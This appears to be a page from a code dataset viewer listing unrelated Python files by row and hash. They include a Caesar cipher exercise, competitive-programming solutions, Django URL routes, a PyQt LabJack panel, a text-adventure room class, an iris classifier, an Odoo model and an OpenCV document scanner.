letter = alphabet.index(letter)
newletter = letter + n
newletter = newletter % 26 # keeps it under 26
newString += (alphabet[newletter])
else:
newString += ' '
newString += str(n)
return newString
def decryption(W):
alpha = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'
num = re.findall(r"\d+", W) # list, I need the first and only entry (num(0))
num = int(num[0])
newerString = ''.join([i for i in W if not i.isdigit()])
newestString = ""
for newletter in newerString:
if newletter != ' ':
newletter = alpha.index(newletter)
newerletter = newletter - num
newerletter = newerletter % 26 # keeps it under 26
newestString += (alpha[newerletter])
else:
newestString += ' '
return newestString
def main():
S = input("Please enter a string: ")
S = S.lower()
n = int(input("Please enter an integer: "))
print(encryption(S, n))
W = encryption(S, n)
print(decryption(W))
main() |
21,990 | bb3e546ff527d7c3d5b16b0078f60bfd52f67c50 | # https://atcoder.jp/contests/joi2015yo/submissions/16057780
# D - シルクロード (Silk Road)
import sys
sys.setrecursionlimit(10 ** 7)
input = sys.stdin.readline
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
n, m = map(int, input().split())
D = list(int(input()) for _ in range(n))
C = list(int(input()) for _ in range(m))
dp = [[f_inf] * (n + 1) for _ in range(m + 1)]
dp[0][0] = 0
for i in range(1, m + 1):
c = C[i - 1]
for j in range(n):
d = D[j]
# 移動しない場合
dp[i][j] = min(dp[i][j], dp[i - 1][j])
# 移動する場合
dp[i][j + 1] = min(dp[i][j + 1], dp[i - 1][j] + c * d)
res = f_inf
for i in range(m + 1):
res = min(res, dp[i][-1])
print(res)
if __name__ == '__main__':
resolve()
|
21,991 | a1333e83bed34022942bd1a35e92884ced968386 | from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.conf.urls.static import static
from . import views
from myapp.views import newcarpage
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index, name = 'myapp_index'),
path('base/', views.base, name = 'myapp_base'),
path('login/', views.user_login, name = 'myapp_user_login'),
path('signup/', views.user_signup, name = 'myapp_user_signup'),
path('logout/', views.user_logout, name = 'myapp_user_logout'),
path('listing/', views.listing, name = 'myapp_listing'),
path('delete/<int:id>/', views.deletelisting, name = 'deletelist'),
path('appointment/', views.appointment, name = 'myapp_appointment'),
path('addappointment/', views.addappointment, name = 'myapp_addappointment'),
#this is car products urls
path('newcarpage/', views.newcarpage, name = 'myapp_newcarpage'),
path('upcomingcar/', views.upcomingcarpage, name = 'myapp_upcomingcarpage'),
path('listingcarpage/', views.listingcarpage, name = 'myapp_listingcarpage'),
path('usedcarpage/', views.usedcarpage, name = 'myapp_usedcarpage'),
#this is car detail urls
path('newcardetail/<int:id>', views.newcardetailpage, name = 'myapp_newcardetailpage'),
path('upcomingcardetail/<int:id>', views.upcomingcardetailpage, name = 'myapp_newcardetailpage'),
path('usedcardetail/<int:id>', views.usedcardetailpage, name = 'myapp_newcardetailpage'),
path('listingcardetail/<int:id>', views.listingcardetailpage, name = 'myapp_newcardetailpage'),
#additional pages
path('aboutus/', views.aboutus, name = 'aboutus'),
path('team/', views.ourteam, name = 'team'),
path('test/', views.testing, name = 'testing'),
path('search/', views.searchfunc, name = 'searchfunc'),
path('contactus/', views.contactuss, name = 'contactus'),
path('testimonials/', views.testimonial, name = 'testimonial'),
path('sellcar/', views.sellcar, name = 'sellcar'),
path('buycar/', views.buycar, name = 'buycar'),
path('predict/', views.predictprice, name = 'predictprice'),
path('newsletter/', views.newsletter, name = 'newsletter'),
path('addtestemonial/', views.addtestemonial, name = 'addtestemonial'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
21,992 | a575961671d068a34ba92f73b27202660e47466d |
from PyQt5 import QtCore
from PyQt5.QtCore import Qt
from PyQt5 import QtGui
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QWidget
from PyQt5 import uic
from LabJackPython import deviceCount, listAll
from labjack import MyU3
Form, Base = uic.loadUiType('connect.ui')
class ConnectPanel(Base, Form):
childNames = ['deviceComboBox', 'propertyViewer']
deviceType = 3
deviceOpened = QtCore.pyqtSignal(MyU3)
deviceDisconnected = QtCore.pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# self.groupButtons()
self.setupUi(self)
self.gatherChildren()
self.setupComboBox()
self.propertyViewer.setColumnCount(2)
self.propertyViewer.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem('Property'))
self.propertyViewer.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem('Value'))
self.propertyViewer.horizontalHeader().setStretchLastSection(True)
self.connectButtons()
def gatherChildren(self):
for name in self.childNames:
child = self.findChild(QtCore.QObject, name)
if child is not None:
setattr(self, name, child)
else:
print("Child '{}' not found!".format(name))
def setupComboBox(self):
self.deviceComboBox.addItem('Select a device...')
self.deviceComboBox.insertSeparator(1)
self.deviceComboBox.addItem('Refresh list')
self.deviceComboBox.insertSeparator(3)
self.deviceComboBox.currentIndexChanged.connect(self.comboBoxCallback)
self.comboBoxCallback(2)
def comboBoxCallback(self, newIndex):
if newIndex == 0:
pass
elif newIndex == 2:
self.refreshDeviceList()
self.deviceComboBox.setCurrentIndex(0)
elif newIndex >= 4:
self.selectDevice(newIndex - 4)
def clearDevices(self):
self.propertyViewer.clearContents()
self.propertyViewer.setRowCount(0)
MyU3.close_all()
self.deviceDisconnected.emit()
for i in range(self.deviceComboBox.count(), 3, -1):
self.deviceComboBox.removeItem(i)
def refreshDeviceList(self):
self.clearDevices()
devices = listAll(self.deviceType)
self.deviceList = []
for key in devices.keys():
self.deviceComboBox.addItem(devices[key]['deviceName'])
self.deviceList.append(devices[key])
def selectDevice(self, index):
dev = self.deviceList[index]
sn = dev['serialNumber']
self.myu3instance = MyU3(False, sn)
self.displayProperties()
def displayProperties(self):
self.updatePropertyViewer()
self.deviceOpened.emit(self.myu3instance)
def updatePropertyViewer(self):
prop = self.myu3instance.configU3()
ioprops = self.myu3instance.configIO()
prop['FIOAnalog'] = ioprops['FIOAnalog']
prop['EIOAnalog'] = ioprops['EIOAnalog']
self.propertyViewer.setRowCount(len(prop))
for i, (key, val) in enumerate(prop.items()):
self.propertyViewer.setItem(i, 0, QtWidgets.QTableWidgetItem(key))
self.propertyViewer.setItem(i, 1, QtWidgets.QTableWidgetItem(str(val)))
def groupButtons(self, buttons, tag):
if not hasattr(self, 'buttonGroups'):
self.buttonGroups = {}
group = QtWidgets.QButtonGroup()
for i, b in enumerate(buttons):
b.setCheckable(True)
b.setChecked(i == 0)
group.addButton(b)
group.setId(b, i)
group.setExclusive(True)
self.buttonGroups[tag] = group
def connectButtons(self):
pass
if __name__ == '__main__':
app = QtWidgets.QApplication([])
panel = ConnectPanel()
panel.show()
app.exec_()
|
21,993 | ac33c8c98031f731820f10e408bfc074796852f3 | # Implement a class to hold room information. This should have name and
# description attributes.
# making a change for initial push
from termcolor import colored
class Room:
def __init__(self, name, description, is_lit=True):
self.name = name
self.description = description
self.list = []
self.is_lit = is_lit
def show_exits(self):
directions = []
if hasattr(self, 'n_to'):
directions.append('North')
if hasattr(self, 's_to'):
directions.append('South')
if hasattr(self, 'e_to'):
directions.append('East')
if hasattr(self, 'w_to'):
directions.append('West')
if len(directions) == 0:
print(colored(f' You see no exit to this room!\n',
'green', attrs=['bold']))
elif len(directions) == 1:
print(
colored(f' You see an exit to the {directions[0]}\n', 'green', attrs=['bold']))
elif len(directions) == 2:
print(colored(
f' You see exits to the {directions[0]} and {directions[1]}\n', 'green', attrs=['bold']))
elif len(directions) == 3:
print(colored(
f' You see exits to the {directions[0]}, {directions[1]}, and {directions[2]}\n', 'green', attrs=['bold']))
else:
print(colored(f' You see exits in all directions.\n',
'green', attrs=['bold']))
# Declare all the rooms
room = {
'outside': Room("Outside Cave Entrance",
"North of you, the cave mouth beckons"),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east."""),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light
flickers in the distance, but there is no way
across the chasm."""),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""", is_lit=False),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely
emptied by earlier adventurers. The only exit
is to the south.""", is_lit=False),
'traproom': Room("Trap Room", """The door slams behind you and you hear
the lock click as it shuts. You see a shrine
to the great goddess of the willows. Maybe you
should leave an offering...""", is_lit=False),
}
# Link rooms together
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']
room['narrow'].s_to = room['traproom']
|
21,994 | 46226ccd553a7e390a4242bc3249ebf3ff0c27f7 | from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
def training_classificator(dataset):
# taking the data of the iris flower from the dataset
X = dataset['data']
# taking the classification of the flower from the dataset
# 0 = Setosa | 1 = Versicolurs | 2 = Virginica
y = dataset['target']
X_train, X_test, y_train, y_test = train_test_split(X, y)
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
prediction_train = model.predict(X_train)
prediction_test = model.predict(X_test)
# calculate the accuracy of the model for the training
accuracy_train = accuracy_score(y_train, prediction_train)
# calculate the accuracy of the model for the test
accuracy_test = accuracy_score(y_test, prediction_test)
print(f"Train: {accuracy_train} \nTest: {accuracy_test}")
if __name__ == '__main__':
dataset = load_iris()
training_classificator(dataset) |
21,995 | b3c7c58f1361753f379412c8f7884954e2e54048 | from Wallet import app
from dashboard import Dashboard
from expense import Expense
from income import Income
from reward import Reward
from savings import Savings
def register_views():
Dashboard.register(app)
Expense.register(app)
Income.register(app)
Reward.register(app)
Savings.register(app)
|
21,996 | dcceb0f39095f0b47464d392172950d1455741a4 | #
# @lc app=leetcode id=2042 lang=python3
#
# [2042] Check if Numbers Are Ascending in a Sentence
#
# @lc code=start
class Solution:
def areNumbersAscending(self, s: str) -> bool:
prev = -1
arr = s.split(' ')
for i in range(len(arr)):
if arr[i].isnumeric():
current_number = int(arr[i])
if current_number > prev:
prev = current_number
else:
return False
return True
# @lc code=end
|
21,997 | 754b581bf1bc82671714a32dd931c0fcc12b4b88 | # -*- coding: utf-8 -*-
from openerp import models, fields
class ResourceCalendar(models.Model):
""" Extend resource.calendar to support Estate Business Process
"""
_inherit = 'resource.calendar'
condition_ids = fields.One2many('hr_indonesia.calendar_condition', 'resource_calendar_id', 'Calendar Condition')
class Condition(models.Model):
"""
Support mandatory early in and late out
"""
_name = 'hr_indonesia.calendar_condition'
_description = 'HR Indonesia Calendar Condition'
resource_calendar_id = fields.Many2one('resource.calendar', 'Resource Calendar')
name = fields.Char('Condition')
time = fields.Float('Time', help='* negative value, early-in'\
'* positive value, late-out.')
type = fields.Selection([('in', 'Mandatory Early In'),
('out', 'Mandatory Early Out'),
('optional', 'Optional In/Out')],
'Condition Type') |
21,998 | c445780d852913024ef26f9669c886e1176574c5 | import numpy as np
H,W = map(int, input().split())
S = [list(input()) for _ in range(H)]
w_point = [[0 for i in range(W)] for j in range(W)]
for h in range(H):
bw = 0
for w in range(W):
if S[h][w] == '#':
for i in range(bw,w):
w_point[h][i] = w - bw
bw = w + 1
if w == W -1:
for i in range(bw, w+1):
w_point[h][i] = w+1 - bw
h_point = [[0 for i in range(W)] for j in range(W)]
for w in range(W):
bh = 0
for h in range(H):
if S[h][w] == '#':
for i in range(bh,h):
h_point[i][w] = h - bh
bh = h + 1
if h == H - 1:
for i in range(bh, h+1):
h_point[i][w] = h+1 - bh
print(np.max(np.array(w_point)+np.array(h_point)-1)) |
21,999 | ac82111aae50159fa24cbd92e847d7db3e06d748 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 23:40:41 2020
@author: harshvardhan
"""
def CannyE(grayImageBlur):
return cv2.Canny(grayImageBlur, 100, 300, 3)
def SobelE(img):
vertical_filter = [[-1,-2,-1], [0,0,0], [1,2,1]]
horizontal_filter = [[-1,0,1], [-2,0,2], [-1,0,1]]
n,m = img.shape
edges_img = img.copy()
for row in range(3, n-2):
for col in range(3, m-2):
local_pixels = img[row-1:row+2, col-1:col+2]
vertical_transformed_pixels = vertical_filter*local_pixels
vertical_score = vertical_transformed_pixels.sum()/4
horizontal_transformed_pixels = horizontal_filter*local_pixels
horizontal_score = horizontal_transformed_pixels.sum()/4
edge_score = (vertical_score**2 + horizontal_score**2)**.5
edges_img[row, col] = [edge_score]*3
edges_img = edges_img/edges_img.max()
return edges_img
import numpy as np
import cv2
import imutils
img = cv2.imread("test.jpg")
orig = img.copy()
if img.shape[0]>1500 and img.shape[1]>1200:
#Rescaling the image
scale_percent = 20# percent of original size
width = int(img.shape[1] * scale_percent / 100)
height = int(img.shape[0] * scale_percent / 100)
dim = (width, height)
# resize image
img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
grayImageBlur = cv2.blur(grayImage,(3,3))
print("Which Edge Detection Technique :")
print("1 - Canny :")
print("2 - Sobel :")
n = int(input())
if n==1:
edgedImage = CannyE(grayImageBlur)
if n==2:
edgedImage = SobelE(grayImageBlur)
st = str(n)+"img.jpg"
cv2.imshow("Edge Detected Image", edgedImage)
cv2.imwrite(st, edgedImage)
cv2.waitKey(0) # press 0 to close all cv2 windows
cv2.destroyAllWindows()
# find the contours in the edged image, sort area wise
# keeping only the largest ones
allContours = cv2.findContours(edgedImage.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
allContours = imutils.grab_contours(allContours)
# descending sort contours area and keep top 1
allContours = sorted(allContours, key=cv2.contourArea, reverse=True)[:1]
# approximate the contour
perimeter = cv2.arcLength(allContours[0], True)
ROIdimensions = cv2.approxPolyDP(allContours[0], 0.02*perimeter, True)
# show the contour on image
cv2.drawContours(img, [ROIdimensions], -1, (0,255,0), 2)
cv2.imshow("Contour Outline", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# reshape coordinates array
ROIdimensions = ROIdimensions.reshape(4,2)
# list to hold ROI coordinates
rect = np.zeros((4,2), dtype="float32")
# top left corner will have the smallest sum,
# bottom right corner will have the largest sum
s = np.sum(ROIdimensions, axis=1)
rect[0] = ROIdimensions[np.argmin(s)]
rect[2] = ROIdimensions[np.argmax(s)]
# top-right will have smallest difference
# botton left will have largest difference
diff = np.diff(ROIdimensions, axis=1)
rect[1] = ROIdimensions[np.argmin(diff)]
rect[3] = ROIdimensions[np.argmax(diff)]
# top-left, top-right, bottom-right, bottom-left
(tl, tr, br, bl) = rect
# compute width of ROI
widthA = np.sqrt((tl[0] - tr[0])**2 + (tl[1] - tr[1])**2 )
widthB = np.sqrt((bl[0] - br[0])**2 + (bl[1] - br[1])**2 )
maxWidth = max(int(widthA), int(widthB))
# compute height of ROI
heightA = np.sqrt((tl[0] - bl[0])**2 + (tl[1] - bl[1])**2 )
heightB = np.sqrt((tr[0] - br[0])**2 + (tr[1] - br[1])**2 )
maxHeight = max(int(heightA), int(heightB))
# Set of destinations points for "birds eye view"
# dimension of the new image
dst = np.array([
[0,0],
[maxWidth-1, 0],
[maxWidth-1, maxHeight-1],
[0, maxHeight-1]], dtype="float32")
# compute the perspective transform matrix and then apply it
transformMatrix = cv2.getPerspectiveTransform(rect, dst)
# transform ROI
scan = cv2.warpPerspective(orig, transformMatrix, (maxWidth, maxHeight))
# lets see the wraped document
cv2.imshow("Scaned",scan)
cv2.waitKey(0)
cv2.destroyAllWindows()
# convert to gray
scanGray = cv2.cvtColor(scan, cv2.COLOR_BGR2GRAY)
# display final gray image
cv2.imshow("scanGray", scanGray)
cv2.waitKey(0)
cv2.destroyAllWindows()
from skimage.filters import threshold_local
# increase contrast incase its document
T = threshold_local(scanGray, 9, offset=8, method="gaussian")
scanBW = (scanGray > T).astype("uint8") * 255
# display final high-contrast image
cv2.imshow("scanBW", scanBW)
cv2.waitKey(0)
cv2.destroyAllWindows() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.